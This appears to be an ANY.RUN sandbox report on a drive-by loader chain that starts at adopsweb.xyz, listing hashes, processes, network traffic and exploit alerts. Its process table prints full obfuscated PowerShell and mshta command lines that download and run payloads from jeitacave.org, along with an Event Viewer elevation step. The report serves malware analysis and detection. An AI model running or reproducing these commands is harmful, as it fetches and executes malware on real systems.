analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://adopsweb.xyz/

Full analysis: https://app.any.run/tasks/e2026dfb-4b41-4408-9875-fd7dcbc4b1a5
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: September 18, 2019, 16:08:53
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
loader
Indicators:
MD5:

FF20248C0B634F057FA3FEE8D4B530F4

SHA1:

010A4E987705E5813D29F3451A4316F58919B6AF

SHA256:

A5AC73CFD511D5BF66FB5D250CCEABE21487A2A77C6D1807624B7670A4DD0980

SSDEEP:

3:N1KfaAr:Cn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • mshta.exe (PID: 2608)
    • Starts Visual C# compiler

      • powershell.exe (PID: 3440)
      • powershell.exe (PID: 3200)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2472)
      • msiexec.exe (PID: 2612)
  • SUSPICIOUS

    • Reads Internet Cache Settings

      • mshta.exe (PID: 2608)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • iexplore.exe (PID: 1008)
    • Creates files in the user directory

      • mshta.exe (PID: 2608)
      • powershell.exe (PID: 3200)
    • Application launched itself

      • powershell.exe (PID: 2472)
    • Executes PowerShell scripts

      • powershell.exe (PID: 2472)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2612)
  • INFO

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 1008)
    • Reads internet explorer settings

      • iexplore.exe (PID: 1008)
      • mshta.exe (PID: 2608)
    • Changes internet zones settings

      • iexplore.exe (PID: 3624)
    • Application launched itself

      • iexplore.exe (PID: 3624)
      • msiexec.exe (PID: 2612)
    • Creates files in the user directory

      • iexplore.exe (PID: 1008)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
52
Monitored processes
15
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe mshta.exe powershell.exe eventvwr.exe no specs eventvwr.exe mmc.exe powershell.exe no specs csc.exe no specs cvtres.exe no specs msiexec.exe powershell.exe csc.exe cvtres.exe no specs msiexec.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3624"C:\Program Files\Internet Explorer\iexplore.exe" "http://adopsweb.xyz/"C:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1008"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3624 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2608mshta http://jeitacave.org/hta.htaC:\Windows\system32\mshta.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2472"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGoAZQBpAHQAYQBjAGEAdgBlAC4AbwByAGcALwBwAHMAMAAwADEALgBqAHAAZwAnACkADQAKAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3536"C:\Windows\System32\Eventvwr.exe" C:\Windows\System32\Eventvwr.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Event Viewer Snapin Launcher
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2984"C:\Windows\System32\Eventvwr.exe" C:\Windows\System32\Eventvwr.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Event Viewer Snapin Launcher
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3680"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" C:\Windows\system32\mmc.exe
Eventvwr.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft Management Console
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3440"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAG0AcwBpAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE0AcwBpAEkAbgBzAHQAYQBsAGwAUAByAG8AZAB1AGMAdAAoAHMAdAByAGkAbgBnACAAcABhAGMAawBhAGcAZQBQAGEAdABoACwAIABzAHQAcgBpAG4AZwAgAGMAbwBtAG0AYQBuAGQATABpAG4AZQApADsADQAKAA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAGEAbABVAEkAKABpAG4AdAAgAGQAdwBVAEkATABlAHYAZQBsACwAIABJAG4AdABQAHQAcgAgAHAAaABXAG4AZAApADsADQAKAH0ADQAKAA0ACgAiAEAADQAKAFsAbQBzAGkAXQA6ADoATQBzAGkAUwBlAHQASQBuAHQAZQByAG4AYQBsAFUASQAoADIALAAwACkAOwANAAoAWwBtAHMAaQBdADoAOgBNAHMAaQBJAG4AcwB0AGEAbABsAFAAcgBvAGQAdQBjAHQAKAAiAGgAdAB0AHAAOgAvAC8AagBlAGkAdABhAGMAYQB2AGUALgBvAHIAZwAvADEAVQAyADIAbgBPAEoASABGAGQARABtAFkAYwBnAEMAUwAuAGoAcABnACIALAAiACIAKQANAAoAZQB4AGkAdAANAAoAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3860"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\Low\dasxaw1i.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
3376C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\Low\RES20E7.tmp" "c:\Users\admin\AppData\Local\Temp\Low\CSC20E6.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
Total events
1 005
Read events
931
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
17
Unknown types
5

Dropped files

PID
Process
Filename
Type
3624iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico
MD5:
SHA256:
3624iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3440powershell.exeC:\Users\admin\AppData\Local\Temp\Low\dasxaw1i.cmdlinetext
MD5:9065F5458530EB2C813423122DE51B8B
SHA256:431A81708D7FA14B588784794C9022E2737D27402146E88E6306BF3C5AEE6F87
3860csc.exeC:\Users\admin\AppData\Local\Temp\Low\CSC20E6.tmpres
MD5:6D3EDF4362EF9AE6EBB32984FA2B7680
SHA256:BAF070B2B65A9B8852E81CE649F5C996A51E6078A21B129F3F4A9FD7AC26FCF9
1008iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RXMOEQQJ\alfcck_xyz[1].htmhtml
MD5:BC11A7E1430E3FB15BAC0F7164BD0A21
SHA256:445F8039159E4E11479A45198F51FF4790A2F5AB7CD8B17C241999183F7CDBAA
1008iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.datdat
MD5:5D42E672F3E3820EDB1D01E5A92B7A46
SHA256:5ED2D48F39BD4475B108D60A682BC76C522BBB6CAFED56CE3DFF253060F3EC56
1008iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\index.datdat
MD5:572B13540A9F066BAD72A6B4744E8761
SHA256:49D92B697CB4E39AFB26C972633C86EE3AF32879618C8B56C411D316968A397F
1008iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@tyasmi[1].txttext
MD5:BD5BA3F66ABD8F5ABD5DA5718DEA1AE7
SHA256:B620180DAFC55DDAE277B3743DE0ECCC741B2F02DBFA1473789FFBDA05F5A834
3376cvtres.exeC:\Users\admin\AppData\Local\Temp\Low\RES20E7.tmp
MD5:
SHA256:
3860csc.exeC:\Users\admin\AppData\Local\Temp\Low\dasxaw1i.dll
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
9
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1008
iexplore.exe
GET
200
104.24.113.108:80
http://alfcck.xyz/3.htm
US
text
440 b
malicious
1008
iexplore.exe
GET
404
104.24.113.108:80
http://alfcck.xyz/cdn-cgi/apps/head/xGpmLMHiaqCy-agu1ud6fHqKiTo.js
US
malicious
2472
powershell.exe
GET
200
104.28.18.126:80
http://jeitacave.org/1808132.jpg
US
executable
81.5 Kb
malicious
2472
powershell.exe
GET
200
104.28.18.126:80
http://jeitacave.org/pe.jpg
US
text
462 Kb
malicious
2472
powershell.exe
GET
200
104.28.18.126:80
http://jeitacave.org/ps001.jpg
US
text
81.6 Kb
malicious
1008
iexplore.exe
GET
200
104.24.113.108:80
http://alfcck.xyz/
US
html
7.59 Kb
malicious
2612
msiexec.exe
GET
200
104.28.18.126:80
http://jeitacave.org/1U22nOJHFdDmYcgCS.jpg
US
executable
3.43 Mb
malicious
1008
iexplore.exe
GET
200
104.28.17.73:80
http://tyasmi.xyz/
US
html
205 b
suspicious
2608
mshta.exe
GET
200
104.28.18.126:80
http://jeitacave.org/hta.hta
US
html
466 b
malicious
1008
iexplore.exe
GET
200
104.18.56.245:80
http://adopsweb.xyz/
US
html
234 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3624
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
1008
iexplore.exe
104.18.56.245:80
adopsweb.xyz
Cloudflare Inc
US
shared
104.28.17.73:80
tyasmi.xyz
Cloudflare Inc
US
shared
1008
iexplore.exe
104.28.16.73:80
tyasmi.xyz
Cloudflare Inc
US
shared
1008
iexplore.exe
104.24.113.108:80
alfcck.xyz
Cloudflare Inc
US
shared
104.24.113.108:80
alfcck.xyz
Cloudflare Inc
US
shared
2608
mshta.exe
104.28.18.126:80
jeitacave.org
Cloudflare Inc
US
shared
2612
msiexec.exe
104.28.18.126:80
jeitacave.org
Cloudflare Inc
US
shared
2472
powershell.exe
104.28.18.126:80
jeitacave.org
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
adopsweb.xyz
  • 104.18.56.245
  • 104.18.57.245
suspicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
tyasmi.xyz
  • 104.28.16.73
  • 104.28.17.73
suspicious
dns.msftncsi.com
  • 131.107.255.255
shared
alfcck.xyz
  • 104.24.113.108
  • 104.24.112.108
malicious
jeitacave.org
  • 104.28.18.126
  • 104.28.19.126
malicious

Threats

PID
Process
Class
Message
1008
iexplore.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
1008
iexplore.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
1008
iexplore.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
1008
iexplore.exe
Attempted User Privilege Gain
ET WEB_CLIENT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Percent Hex Encode
1008
iexplore.exe
Attempted User Privilege Gain
ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Function Name
1008
iexplore.exe
Attempted User Privilege Gain
ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct Hex Encode
1008
iexplore.exe
Attempted Administrator Privilege Gain
ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct M2
1008
iexplore.exe
A Network Trojan was detected
ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M3
1008
iexplore.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
1008
iexplore.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
2 ETPRO signatures available at the full report
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144